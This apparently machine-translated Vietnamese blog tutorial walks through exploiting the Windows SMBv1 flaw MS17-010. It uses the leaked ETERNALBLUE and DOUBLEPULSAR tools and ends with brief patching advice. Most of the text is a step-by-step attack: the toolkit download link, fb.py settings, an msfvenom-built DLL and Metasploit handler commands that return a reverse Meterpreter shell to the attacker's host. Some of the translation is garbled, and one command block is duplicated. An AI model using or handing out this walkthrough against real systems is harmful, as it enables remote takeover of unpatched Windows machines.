Shadow Brokers đã gây sốc cho thế giới một lần nữa lại bị rò rỉ tài liệu bí mật, có chứa một số các lỗ hổng từ xa của Windows có thể bao phủ...
Shadow Brokers đã gây sốc cho thế giới một lần nữa lại bị rò rỉ tài liệu bí mật, có chứa một số các lỗ hổng từ xa của Windows có thể bao phủ được một số lượng lớn các máy chủ Windows, các máy chủ Windows gần như tất cả các hội đồng quản trị qua đêm nguy cơ.
MS-17-10 là gì?
Các lỗ hổng triển khai mã lệnh ở xa tồn tại theo cách mà máy chủ Microsoft Server Message Block 1.0 (SMBv1) xử lý các yêu cầu nhất định. Một kẻ tấn công khai thác thành công các lỗ hổng có thể có được khả năng thực thi mã trên máy chủ đích.
Để khai thác lỗ hổng này, trong hầu hết các tình huống, một kẻ tấn công không thẩm định có thể gửi một gói tin được chế tạo đặc biệt đến một máy chủ SMBv1 mục tiêu.
Khai thác ms-17-10
Mô-đun ETERNALBLUE trong công cụ là một chương trình khai thác lỗ hổng có thể khai thác cổng mở 445 của máy Windows, bài báo này đã khai thác khai thác:
1.NSA tiết lộ công cụ tải về:
Https://github.com/x0rz/EQGRP_Lost_in_Translation
2. Lắp đặt
- Python 2.6
- Pywin32
Cấu hình môi trường, trong EQGRP_Lost_in_Translation tải về để giải nén tập tin, tìm \ windows \ fb.py , hai phần sau đây của bình luận.

3. Môi trường
- Máy kẻ xâm nhập: IP: 192.168.71.130, Hệ điều hành: Kali Linux / IP: 192.168.71.133, Hệ điều hành: winserver 2008 32bit
- Máy mục tiêu: IP: 192.168.199.107, Hệ điều hành: win7 64bit
4. Khai thác
Chạy fb.py

Thiết lập địa chỉ IP tấn công 192.168.199.107, địa chỉ gọi lại 192.168.71.133

Tiếp theo nhập lệnh:
UseETERNALBLUE
Tiếp theo là điền vào các thông số có liên quan, làm thêm giờ và các thông số mặc định khác có thể là một trở lại vận chuyển trực tiếp:

Vì mục tiêu là hệ thống win7, hãy chọn thông tin hệ thống mục tiêu 1: win72k8r2

Lựa chọn chế độ 1: FB

Xác nhận thông tin, thực hiện


Sau khi thành công, sau đó chạy sử dụng Doublepulsar:

Và điền vào các tham số lần lượt, chú ý đến sự lựa chọn của chức năng 2, rundll

Trong máy tấn công, msfvenom tạo ra dll tấn công

Sau đó thực hiện:
$ Msfconsole
msf> useexploit / multi / handler
msf> thiết lập LHOST192.168.71.130
msf> set LPORT 5555
msf> đặt PAYLOADwindows / x64 / meterpreter / reverse_tcp
msf> khai thác
msf> useexploit / multi / handler
msf> thiết lập LHOST192.168.71.130
msf> set LPORT 5555
msf> đặt PAYLOADwindows / x64 / meterpreter / reverse_tcp
msf> khai thác

Đồng thời sẽ được tạo ra bởi upload.dll để tấn công máy bay 1 (192.168.71.133), trở lại tấn công máy bay 1, điền vào đường dẫn dll tấn công:

Tiếp theo là một trở lại vận chuyển, việc thực hiện các cuộc tấn công

Trên máy Linux Kali, lấy vỏ lại

Làm thế nào để khắc phục
Microsoft cho biết họ đã vá lỗ hổng Windows do nhóm Shadow Brokers phát hành. Có thể đến từ công cụ hacker của Cơ quan An ninh Quốc gia được phát hành trực tuyến ngày hôm qua, Microsoft có thể kiểm tra và xác nhận rằng bản vá đã có sẵn cho tất cả các phiên bản Windows hiện đang được hỗ trợ. Điều này có nghĩa là các hệ thống Windows XP hoặc Windows Vista cũ hơn vẫn có thể bị tổn thương bởi ba lỗ hổng được phát hành nhưng Microsoft không cung cấp bản vá lỗi cho các phiên bản Windows cũ vì Microsoft không hỗ trợ nó. Hãy cập nhật miếng vá kịp thời và đóng cổng 139,445,3389 cần thiết.
https://securityonline.info/2017/04/25/exploit-windows-machine-ms-17-10-easy-like-ms08_067/
COMMENTS